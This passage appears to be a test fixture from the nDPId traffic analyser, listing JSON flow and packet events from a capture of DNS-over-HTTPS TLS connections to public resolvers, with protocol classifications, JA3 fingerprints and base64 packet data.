yBa2yqUn\/9nlC+Nlg+hPHBSdvrZNSMA+riMftxpQlj6FTL7EYx8bKMIfPYnyZddeZmxpXN9XqWLs7KrnqynK9ZMJhVvaIAMfyuBU2fqyPpflnNhs96RaJ+FGM\/iw\/mZYOsIhH2JBIZKVlvkBCQxCbysphauFVIsTMYeZEcsoCjFB1qKXHuCceZxP4Jy7kiXMgSTdDFzzGYgYfCng1fFfHI7zfjdtWkPQ9HPe5f9egBljz+JDS6ehJP7PfY20bsjB73IKGpwaFJB2W5txeWuX9YJMSmwLmC9CvECSoWQlENl+g"} -01084{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":408,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739389936,"flow_last_seen":946739390265,"flow_idle_time":7440000,"flow_min_l4_payload_len":281,"flow_max_l4_payload_len":1410,"flow_tot_l4_payload_len":1691,"flow_avg_l4_payload_len":845,"midstream":1,"thread_ts_msec":946739390265,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.76.113.31","src_port":52028,"dst_port":8443,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"doh.seby.io","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -02363{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":409,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":3,"flow_last_seen":946739390265,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1464,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1464,"pkt_l4_len":1430,"thread_ts_msec":946739390265,"pkt":"ZmZmZmZmRERERERECABFAAWq7z5AAC8G9+ctTHEfCgAAASD7yzz9Ej0SWq\/nalAQAfnqiwAAu9LAVBlO+s0L+nkwU4YXcw1SOmlRl+XSnXuO6tKFQ694AGFrib2S2f3BX7B1582XtNQQL\/1IwqS9eCXYJzjdfbbKDKnkw+MRH36zeNfFmebdTa26VGWOgnZNECwEpmFBvEXSt2RPI6ofb1vE32eZrFh79Bpuwp1PCG2ngGNn3Z\/o1aRMv577hTiLGHUP3zlCYCAacHiSAEi\/LQgxJOLyR9jugiMcNQxMzI9B1anoxyifvPkh2BJiEbyAypQ1hQGudgFCLTi2Txkt7Eu\/NIUQoPpDLsdh3lHWxNLyLEP9wpzBgp6l3ilL84X1Mk7ZHQuPK\/Oz4yfrJd+G7Oo6i1yrQ\/Adp3qU8KnQ9ptwaIVLOtg8g5ENilAbdYS7Ka3cZHFz4gvVtmLddRHiTcXVf5C1ypTeGluZMusSnmJOjPWY5fp5RP99ayjRwQRdkg+IcNHiO31ps8qxZvYyOJZ7Fb87gLgZwV0IUvyDuDbizEwr2XSGbMEZuVoSHx9QyUP+A3BPmqRGGD9RWvZIaULosdFkVeC1hEiNEcM30Eo27GhCBEkpzGPbQ95LfK337HDa9UlKAktQhKwG8\/hAtMIbbv5Noetnx3T81i7FzhkyHH\/C6g3BkR97pP7xxNGSesRAej+0SV1z2Ux2yezANH89JV1k9OQdFbMalrjLnx8kanK4YG3Zfke83pATlf6RAPV3lPyNNDQQypoZkugKEUxOXS7Rx2XEo0segrTQp7Q+35xLorFirg\/3rbokzMw54\/alVY08gHsLJlNmadq9IZ0Hjxo7ykUIQsSRH59BS476g7Zzq0D6LzWm8dRwgOJiFmUme9r5za2XErhkjyFFtknvfbQcxGFpshYQjf44nBtFebBI6Th81Pz6P4vS1Ab5Ldbe5kqW2W6OFyHBCtpJQLdqxOC1y4j8o1zpDr\/5I6fMit0JvTc1WNaN6qBFlg1P6Gaatd4VK3xOWgpdV7lGy9Cs1aJIggG2JQikJ7xxWvncFI3YNX\/j7e31omXzttI+wKWBnq3libBpSCKXTzvdWZpJ16RDkXLbmBFLlruWHpbIZvg3vh187AjFKcBshFCVg\/9CKx0tdclgUGbHqJ7E6OtJIm4m4kox5tzQjCDUJNS29SjoWoK9anOoaXw7azu80JwAvB5wDC4mKG4pcolzPcWCdGzgc4j\/1wLg0a7\/6J83Mv9Vwe7sgJa0WfVmJh67OWIpAbZv84XgLPcLVo5yXd6\/yWWRMvn+kXy6mm6tMTinzOpwIpfSCVQtp3DNLsEUsIkV1DrWVNbTPvH5GCVkQ8p3Lo5BGZ2lF4qqWWh0bwR33Xc69aAXaHUgKcezVe1FfG3x1Q3qp0cn65Dxae+n\/hfZa1KqbpdsxY\/eLTfFV7m+HIJAbLFSSzH7PU\/MSQj8rvEXnuHMSR3htHNgcZRMLZGZNMcEgX88HYGJMITbgLbQ1nfRTwzL8m8XTnhZtErha6pHrFlPsZ1RNjcoqZKgLKdMg2ezfrI8Jq0lQFzAOf3F4VPbIGq1krTP43rpCLbzYETrqQH8Xz467NmG5PHVJ3Hne12KAqQma4zC6YHwFBTwWUunyHc7Z86uw6NV1GMEfe39uxIB1Th3Q3mEC1zo37vRQUYEr8R3n9WX5ZtJpDmxGTtrG8c0JVrUZpjFnqPj2Uj069ivRfFVD19zTIWIWwVZHNTkf54z1SZJ+bsWwla3CC3KyaPHGsTreYdevDYggE2Ww91a5tn8NCHUwyaWPcCmBikp3+fKDZwg0dx3gKVzU8Hf9Km4EdsDin7gSeY7n3yByLcyqnB3hOSBc1nuPCEOi+hB9GXpEuBRdmMhQLcAelRdGq2lZwOE87jAboVg7rc+WH1wOyzCb4UJFuzyaFs37Li8enr+"} -00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":425,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739390933,"flow_last_seen":946739390933,"flow_idle_time":7440000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":283,"flow_avg_l4_payload_len":283,"midstream":1,"thread_ts_msec":946739390933,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"217.169.20.23","src_port":34036,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00844{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":425,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":1,"flow_last_seen":946739390933,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":337,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":337,"pkt_l4_len":303,"thread_ts_msec":946739390933,"pkt":"REREREREZmZmZmZmCABFAAFDddBAAH4G12cKAAAB2akUF4T0AbuSPuOKlASrClAYAfavsgAAFgMBARYBAAESAwMYXSzw+8AvMstO05PQ7qPBj27f4mGkG8QM9OU7ZRFcuCDJZDN\/6VucUquGKl+O4ES6VCX4Z6V\/a7wGR73kRIiX4wAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAACjAAAAEgAQAAANZG5zLmFhLm5ldC51awAFAAUBAAAAAAAKAAoACAAdABcAGAAZAAsAAgEAAA0AGgAYCAQEAwgHCAUIBgQBBQEGAQUDBgMCAQID\/wEAAQAAEAAOAAwCaDIIaHR0cC8xLjEAEgAAACsACQgDBAMDAwIDAQAzACYAJAAdACAuLsKlIgLTs2y17K315yEyJxqnsCXfl0yS1kyaNKG0aQ=="} -00905{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":425,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739390933,"flow_last_seen":946739390933,"flow_idle_time":7440000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":283,"flow_avg_l4_payload_len":283,"midstream":1,"thread_ts_msec":946739390933,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"217.169.20.23","src_port":34036,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns.aa.net.uk","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -04675{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":426,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":2,"flow_last_seen":946739390967,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":3165,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":3165,"pkt_l4_len":3131,"thread_ts_msec":946739390967,"pkt":"ZmZmZmZmRERERERECABFAAxPNc5AADgGUl7ZqRQXCgAAAQG7hPSUBKsKkj7kpVAYAfW6vgAAFgMDAHoCAAB2AwNggvgT348vLVfztyje+nh951Uui2O3z\/vCGwcNEmcL7CDJZDN\/6VucUquGKl+O4ES6VCX4Z6V\/a7wGR73kRIiX4xMCAAAuACsAAgMEADMAJAAdACCYu4Q1ZjtZfYUrS3fwrroPQafz4tTgHn9jgiQX2w0NexQDAwABARcDAwAgr2vUeHfWinGo7k2fDAirV2y2+2vt58RojQUfF3ywprIXAwMKEF7v66Q95J7Madk2ZEcExfHDptRh16jabZXVGAjSu6ZVpQdW9tsq8WD0VxRfdaushrVbrrTRIk5I0CixRifCcooy6c56kGsUxb8wL+Z+QNmR5uWAeV9nzzlGQpBhNwq90IzHQbBwHdfR22cB\/o+gnP0zKhtFT5pdVatUFFMBXYFPBfgmW+yElY9JLYGDSC\/IIw728fBQlRPlTOPnC6Bd8HZeDEbFd7L\/8oeIRd34AfymHYlFpxJ8CjS4xP7I5o8GpeBcv96KPHtYZV5dsMuE75XBxooOpL9Gr9IWBy6AEdPGcU29oVVhWirzJ93HxYSeGAAYTfsu16+HrpOMUAzFMOyXwLKfIjR9Jx84Zvi3ytxvu8IPsZAmQB9iLco+v\/PYNz44XswLq2rQZtIH4a7\/SiljnI7OvMEtw+9+0ohSjEBjqZNpZ4+Di4Oi4uvLSj90PiJtsiIz50r+luuFIJLrHS\/Bx2ooWNGmf8wIpBNOEoC8uYmbQEc0M0F6MgPM2\/Dc1rxiGmLW966znBcYtqEPAIF5LP4HjDzAMEtUySTvYC8cLBRrZgX4sNAbkCcpNw4QFS6erQa8jKBVOZjyMqQVsAikZDL76qZyWnWAbrLmD+ESPhH+LiOjwj\/BVLLmuPIqP2HgrWrkMLok\/KHXuIbZn7C1n58rcMZq7V+5f3gEi6kXuPOTozMsLixf3wStDsNPpLZW5vF+Opg\/HPuTYMBM+b2VDW0oQ+mGR3v0lSfTyZb2sccxT0\/YFa2\/gZNRs9igar59HBmzwzWtwto1Lj2+tqjOzo9Vxzmqr0QO+5jA9knewsPjci1iEHsBRvkAHDUo8mzkBfWBM8t9UZZElcDeWIg7oO2uY349FEzTQzJrCGLOJ20pc10E+6FXsRSoQcdecc2pqUoNYisiO4BgvfGVRTx3PyLsE2LqpgS5+upDBiBuHq9GTnvPUwfjHUOVZfhEY9kzfkMm52CF0hrFbS1FqZu2k5xWd1RZ+YdcxocleEJLDXEEeCaF2XJug2p3sgxI8AQfg96H0lHo6\/ce7YWyFTSQ5214Zlm5R8arc+k+FFIGpKsd1JRZDuMs6lUG2OcuW4k6GmXOA9lL00+Pu1LlWECRAA38IcMLlvDeoyIVPF5RKHTFbtFfFeynrkfS57BDgpnUQsOLofW+MsR51VSL7z5rFWkT+0yA0OJ4P5J1dZjOVbRrnPj+lP8KBidjvuv\/+vQR9AYL2FUFonbuHYQ6NUOJSyw\/q3koSUCoI9nF1rL5SbnJpgQ9XzQ2ozstAI1DR6AAJPio22EFuEDMEoFVvE\/liE+8UHQnOZNeIN8tMqUAL+WlkvDEcrehWMNUpY287pebSO3eZPDe3egHiaBMZQIlL4jO1lfEjJdr5RXvT9Uv4MVNGGGXCQtr4IWIfMjPSJmmedmBdcxMuZnxTJ7jKLERRom+1LtykcTtbFMZ6nwh7KNIt58CGrTH3Bh+ClGWC6JtjiLbGXtcN8TOs97BoUvfH2xS4muIblEv23sWDZt8uHBdYWb8qBII2zRRCNz4TWmEJd5WuNBsZajJ6+izq\/kuJOWcsJ\/3ClD+JPyh\/faP5RIOC8TtW52DI8iUXjhh0HYoQNP5CK\/yGELUKYphGmQcP1BV0e5C\/xs86j3J4Tqg0y4WesV3d0jU+gkOa\/xZNpDrlV+JnewVAhCkK2UsUk3C84VdKoqUnp9Pil5XcszuqrrK5fn2Ja3xJCvI9oUZYFRkj+cpcHiFBzHL8vrxujIbPqQsQDehofVoxDKQvUog5ZiOw9rqXCH+rf4pa2omETeM1OE52\/bijRwWFKerGk95vgv7mf\/pTz2jvStIe9mIenHJWL7PEZH9sdGDeZQKhralY5AEfcr8PAGFV0XOY4OvHkHHS\/kY45xH7Heg3RGSUSAkY6LhaxYZOH3vCb8pDwz4M8eJ0\/MawhboSpIfQdoDBfBZibpy+ix0cl6f9YHPnTxwCWpi11t8Y\/Ioe5G719Te12HR1+3LJDUG4+t8UMioCT3GNag7c5mMGY+V+40MlPf33OO2SuBDaNUe80cz9ZjBk5x+9\/8yZnlpBgJheqdBeGVTSfNj\/\/ykzVs+ovI3rQWJ7MtuR80iZzcYqQWbI4RBftGKVwyCcJOskMGArD6+UArYfVGIccM6l6ZaD9x6dkigf3LAHA30iuQXdDyjNpxgxl4iSK0oLixFkkGZE94ONcw\/GLLOMYGf3ZsNLQSPf2qyfAF5BKKKg7FAQid7pqgyCZp5F8XKbACdlEb9Lar38xOjvjnewcnGzD4Z6c9THtqSZcDPbz8aL6DmV9lXZmD6\/ccDsDkRU90nhHSMrUF5R8hxDMoP6Be02AohXJwQbll1wPcUEyYk+tfY7XoP1gsqXecmTp+tusAg1\/AwZK8oozX5LgL2HyoOuByw1lgzh0RLilH5JrY3yk0E\/jG5JRoV\/y41cG7xAhvYbSNXDFCXbKeSVI5tgPheZvJ9ZUyIfStt125MRChKnoA2n+mG9KzbpZpyVz66ndTD0j3XU1kDOqjF1\/SbGf1+fhwWGaMMcZUYzUS1y0NN++mGlj87\/Z\/u1peJJRpJLZAkwhE6\/qyvUgAeD6bdzGa3m+9PvZxqRFg4uO5BEHphZPz4E5S9y+qwaFy+ng2E0E\/+Mq99pz8NTeooSlgjy86miBLzf74wOBFSoHbVN0PHL56xSrx12FRC1SCfzqnzT4BREj4eRgr5sVcZJpcqB\/DJ16zqD31Cdz1F6VAt5mHD5hgyW+BhQO6jtpBgHqFisMVPWD18uXILfOEcLKzexTq0enEqkxPPztMgd3lKJoJoLn9D15r82RK7HhKsmZiDKUuCdmH3DjKAbtkj9uSMWDKDEZ7ALu1TTrcVpMz\/u916YJjVrsJ4zke1Y\/PKCwgQji1xX0Q1uKg+Qhmzj0YA6C\/ZB8hBOasuUjTVZER2lXZpSogcQcgdsx7P47du+ZkiOIevUp1ckurR953sVaD3ci+d3blInJn3V2H1nd41bCStQkPyhbrCiGVWDvB4NjqVSIh6ypL1X2Tez7o9uIFek3e\/KdLnjoJYgUoUCdBCeRBScD+0K+sqvZzi8z7OnTzhYK\/aCGv11HpK88nhB\/fu4rCw6Clf8iUvZmwOIdmA\/mXVezV7u9+Y+L4mJOPGGV+Ie7YQjoii0W0J9zldsek4JrCNAfpxxvmfZTghYCrVQJNlGcKyp+LE4s0nXJXsv8iOBmDMV\/qiHS\/RfVp0Al+GVjFpErgTgXH8uFG0eZxhSX5TnPtc5X3FjIRORKWkOyTX+MlnBU+yWrj3iWALBhonn7tNa85eK0vFJHHFGyQm3hMEk7psuYZdoK61bs1KKeUi4RTDX274TTDnDx\/vYrXCGEMbInwJeEUUq10Y0AUNC+ikXVAlZm5\/6b3SLH1mmyzy5AwgfbHNdBdm2h13eHYAHANjDp++p3nOFwMDARmCniHbpabBh0wmz+4GvD7gEaHTo1WwpHFuO0rRndT2cE+rB3NSEIZ\/OfAhdTV9eadRkxEucZ2zRFouLobhVj7VuatuyZROJYubLXxY0L2AD9VfNIXMUeRNHnXvmwyBiqm\/8ZuzuiYxPVzYGJuS41vYyyQm1ND0\/vWricRWNYCIXjgbSqk6PFYh1FVGYRV8SSt7kE3Z3NtrXGW3LuaKD8ymXSg9dYJ9GwRxcPV5is5NEijit\/K0HuZymRnz0biX0ibyZ3bQdAu+3E+KHkL1KMxQnoIP\/X4lavINi95Z\/1+WkK1enaEAwf7tuLJlq5tLt+JOe3OVPJYXu+hVDAzfIFEvugfqxQ4aetpIOYSy0uy\/8Blk6BuP7s0kZRcDAwBF06XPl0W4alPWKLcZUBV1\/sR9gwxnLLJ0WJlMdAUkQ1CCMVwzdsK8lkkZUPttQ7nY8WKaipYb2yNRvSYmxfuU2S\/nIBiL"} -00947{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":426,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739390933,"flow_last_seen":946739390967,"flow_idle_time":7440000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":3111,"flow_tot_l4_payload_len":3394,"flow_avg_l4_payload_len":1697,"midstream":1,"thread_ts_msec":946739390967,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"217.169.20.23","src_port":34036,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"dns.aa.net.uk","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00570{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":427,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":3,"flow_last_seen":946739390970,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":946739390970,"pkt":"REREREREZmZmZmZmCABFAAB4ddJAAH4G2DAKAAAB2akUF4T0AbuSPuSllAS3MVAYAfWu5wAAFAMDAAEBFwMDAEWr1XNIOucPlOXvVPAlxCVPjuVei0Kv510pke\/KbmmoYPXHQYgn\/dXPL9SYgvzqDxY7NHWdbkgaLyLveAQw2UhT5DxScM0="} -00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":439,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739400294,"flow_last_seen":946739400294,"flow_idle_time":7440000,"flow_min_l4_payload_len":292,"flow_max_l4_payload_len":292,"flow_tot_l4_payload_len":292,"flow_avg_l4_payload_len":292,"midstream":1,"thread_ts_msec":946739400294,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"146.255.56.98","src_port":43718,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00854{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":439,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":1,"flow_last_seen":946739400294,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":346,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":346,"pkt_l4_len":312,"thread_ts_msec":946739400294,"pkt":"REREREREZmZmZmZmCABFAAFMOfJAAH4GNZwKAAABkv84YqrGAbtdpqacr2JwdlAYAfaNXAAAFgMBAR8BAAEbAwPHJz7Bz9zA6vh2mAtXguxbTFdhb5D1tFb1Dou8iu1ITyDK94fArz+mQ8rbbzgPn8nq5li5Q+JT9k4ZyOL9YBHZZQAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAACsAAAAGwAZAAAWZG9oLmFwcGxpZWRwcml2YWN5Lm5ldAAFAAUBAAAAAAAKAAoACAAdABcAGAAZAAsAAgEAAA0AGgAYCAQEAwgHCAUIBgQBBQEGAQUDBgMCAQID\/wEAAQAAEAAOAAwCaDIIaHR0cC8xLjEAEgAAACsACQgDBAMDAwIDAQAzACYAJAAdACADmPqzqEwwIPykBECgQ7iBmKhoGpqhv77PEzGKWzxqPw=="} -00914{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":439,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739400294,"flow_last_seen":946739400294,"flow_idle_time":7440000,"flow_min_l4_payload_len":292,"flow_max_l4_payload_len":292,"flow_tot_l4_payload_len":292,"flow_avg_l4_payload_len":292,"midstream":1,"thread_ts_msec":946739400294,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"146.255.56.98","src_port":43718,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"doh.appliedprivacy.net","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -04392{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":440,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":2,"flow_last_seen":946739400340,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":2958,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":2958,"pkt_l4_len":2924,"thread_ts_msec":946739400340,"pkt":"ZmZmZmZmRERERERECABFAAuAAABAADgGq1qS\/zhiCgAAAQG7qsavYnB2XaanwFAQBBOXkAAAFgMDAHoCAAB2AwMDsBehTQYQ\/iH2Yhpyf+mLl1C35r3Ho6TovknKnjr8riDK94fArz+mQ8rbbzgPn8nq5li5Q+JT9k4ZyOL9YBHZZRMCAAAuACsAAgMEADMAJAAdACBo4BH+AA5SyDExxRIaGpKShy1vmsbixTg2m2T2NedPDxQDAwABARcDAwAgvk7ezJo1JZP9LjmZFBvdhSYoK5Td7g7\/A2oIAgI6osUXAwMJ2yS0n6M3Ydri+rIgYVXd+jwuTvP8FF1HMS4hAE9YkVd0802YEbU3pHhUuQANn0vXApBPxbj3FV9uCCuIZCOL4zY7+k\/N9QNOxO6wgqwyjpqF\/MSuGzGbkODdKsjr3MXDrOEDT8UY4Cf7sbDSqOIkajzwlllabjLyw\/JVxOtUepEpKMKQWPduyvGLlnSE+4Pi9X1F5dljLFonfMSt9epl2VwSF1nq8Zl4KKstqyQuG\/zmvd2vjAUtpZ7bRJhqcQEAuZwHSvB\/MtIxXfAzVeG47SjsazBlsuRoBS3fTomilsUH4J13\/0ChaLizKxEdSZ2w2K00iVdJ7hQkti8Yk+XaV61AEfwts012l3Az0Ul6QGn+ovAsikUEMTOdEJmAEExk\/NRuYh4YJeat0fT6qqxPxOtp8iJmxclZOIdEdtKfFRlb\/Q3pIWRMmx+BKdsNQm6TtOsUrqgzJEovgnDvaBUadejY9LBbNHqxMK2V6F7gbnGKVjBjB76l32rCkAGXZjYpu99n3pc8VsX6toeCgNv6uuTb2IhBkEMBsiXbrPavcq8F51o9cjY6ri1T23vFWkuEBAAWOdINJTApJO1joFFgFxyMMNnlCpJoVnqu0i\/rinlDFg7S9CtMSJ0Ubb2fcMiTZVA8sg8c2grczf38tyMaZ9tLwrWkyrDaM66WF+r\/Smzgjb3lUh8vJ3yJCEPyKRtiP8bLVA86MJJR6swDhhbPo5TZc3HPN3paBxU5U9DTyACxQnk6EYqYsA8ZokkmQV3rXvd3nlNnXQvP8iTrcL1LydrbGPEmcxzftt97lwfP6IxI3O3sNlij9LY+i3W9W6NVdJf0gVlPHB34DPsUDzGCBqeTZuUD+fgbA8m0vHZeGLaeh2n\/ATJxgu83kBANWSs0j4JxeZwkxA4LQE6k9KdadeiuFQWUUsCMoytEmeRS+e2CKC26bva8V4F4G5ILpiDrVUa9OPpnIugEC\/pCpbfo45ejO0OYsjmcSB9VHs67ODTG8tfG\/HSnEWghmAKv96DqsZyAaTmkT0JkH5FkXlCzBQ8v8o8b6rSE0lRW\/lesYflMu+sWf50UV63CFJyy6fgpaJPxCw8SCnSJ9Wfe5036kFXS9TxM7sPwyghnAoVeaf7Fck3c5pxthPEaz67tzSOMeekQJOQi7xMcEt3jcaR5XiiPfvpfvbXLOiTYOMcz4nBR25XpUeWEHByMxgi+V+13jYe4gb5oIp\/OYL+ldNmokkEz0NkrXv9PYcDVxLHdE8YvZjA+Y3MOkWFCk9BM\/Rn01CyqbL8CmN\/DvCsMgWqz9BmPnWHQOqMnYSTykXgSFe9FyeKoNSng2DkGXmS4Ish3yys0i\/QIlGlT9piLrC2UOh5tHQYhdkxZTzWOLoSNhJgdpKplLIWgmFyDHNvrhDmwq50tATdlnRMhe0ry66PsM3l0lek7HZ1iPpCZ7a660QlaPE9SZFbRD2hjaqHqZrlPWWwgi6eHfY0gu5vY3pzyuUgNc+IY+oeDLEyaB3ysUDN7Sr1IZYyAtSiOnN0WLtHIeg9uqvR4NEBF0XEfeRxZT0n6RrygJ1nWV+kailDfsz4vklZfPYltDFOyTnwOyyzBO2WpBi+QHoJdR5a+ci207f4TAHC5iWzq9Ov\/CBA21s0iwXcKHtUUuFkXfGsSTcHlMRdWRoqqdrwRmUkHc5FaU6RNse5tyVEdBKfOwfXkDw8I22zIDBmTO4YVBH4Dzw0SEVpSPVqE8m2STbZxIzmRtVGFxbw45tbGu6NUyHfb6XRJMV4vKdl8h+lVfwIggGdSBSYb\/J2WkIjXI5Z1\/s5OXr498b\/Ul1cfjj192V+QV7YEDHDJ0wunGAConliOcHcZIZrOpVaNMM7NeTBxiiUgynpVWjltr\/LQuk0Pld3mEIxmwXht0KmUnXyCvTBJgPYroLRuneYRQPZ1JOgkt\/kdsQBmYrZvkRHKWFwNxkLAhypRqmOoE6eO9TYZgchFtH7ouVK4C6vE0wlk\/wNdktEQVjtjEf81TNo\/lytMdDE\/EAGs9weyRqd\/Hmz5\/6yLIgAilI7sqB7dEuE0iiOXk4T95pQbOjvSnwI7M4B7Q3oDNdWJJRZNp2tZGQNCVfj0OFzEKSZbanefGx8qbWewy7Iup5wriwLbBG\/B7ZFkxdmUnEdpL4pTOBRMxGDxRjV5ioqpujq6Ef07dgH3IGRgJHxsp9J2Qlj8S7lCwwOsTDkI+PhLsXzzIudX\/ZiC+lH4Tm6LciXTHf3hDkr34EJfXHJ2WpSeeCsJZBkZx0OJpBR3y1cyrhzb66IxG0uSRnndSXXBNAmD+Gghsj7Kg4E50GUXibzQRhDNRs87q1TvRNjyYI9h\/opUmKnHAkXz4SItfTxaX2LIVbjHXv1XndcnuHwhJgHhiVGswZvXlXVlX8K4fGgnhgpZ7MSQN2lSYmnj2j7A1n8u\/xbD+JqpDU+SOMNWtYlDQ0M+WzoE91BSSQYj6pIr9DxppqLCgUAfJpZxJ8YTmINwfhMZVMPhUF+vys97o5XgriLF7uzxf2I4907edC79eKV1Vf3Ui9qrIThroIUvlpq69fVaplHqZXdbs+zwj7e2bSPVWUVR0G4cA3aU9fbVCQvpl3a\/SuOWAYL5O1\/gu5GJXDImY\/gEO1xe+OVqS2aF0XojyeNtILIeW1nDYyaMtRMD0J7qIxHbffBANlspXb0qgGJLXRsdV8\/\/lQ9fV9vIoHgsaUsdWxpVNTmqaQBhX+l7X3gEUnrZ2jVkY6Oh5aU+eYdso\/pGSL+gHQ1M1e6uj4SYxfEhZHY1voW\/zrjGcvC2BmpxPhTrZRQE7Z8GgjqyG\/K9Af758C5W6bNB\/xr5yeKDI\/G5cyIFeblO2dJmHUb92Zs9qV6hqZGonI7Nft2QsKRvSQjz6cpX\/ZVUA+5e0AnpZpXEPBjJfZQ24FXs9QBvGk2XnWW8Dboig8I5f6Aa0W91KG5sO3Doyp3jU3SQ\/ah58ZIaBgplOwc2\/XF6kzcQLnHv217TTOCL7ScT90UL1M8uz6xGKTqy83KCKRxOqCSmaU4GimFhTvfwqF7ljKegUp6S9OeYOOt+VYDC0UeVysX6yYVwgIBxXA8D51WCmgGdUznHhIQtp1cWWN2T6pBItiud+sR32LmiE5tMUZYbwm2xu\/Nih47FXpRY2xq\/SEOEBCWv+pct34wnV4RwGw\/IvRU9BDEL1I7Sc1UFJRrazHP37UtPsKE1Z1llTnptgsNBNnDluQKifySFsqvXdr8Wwvn6V56upoM0fLxPG\/\/F6OVsniKNnqDtgpVsVi86SZ5O9M+5OvtEmUD8hQl4gxL2QqLYZIWV6vswIZSATUQuw0pUlpiEaj4PymXC95\/5pMEQnYMyOGFn2xcDAwCAmr0G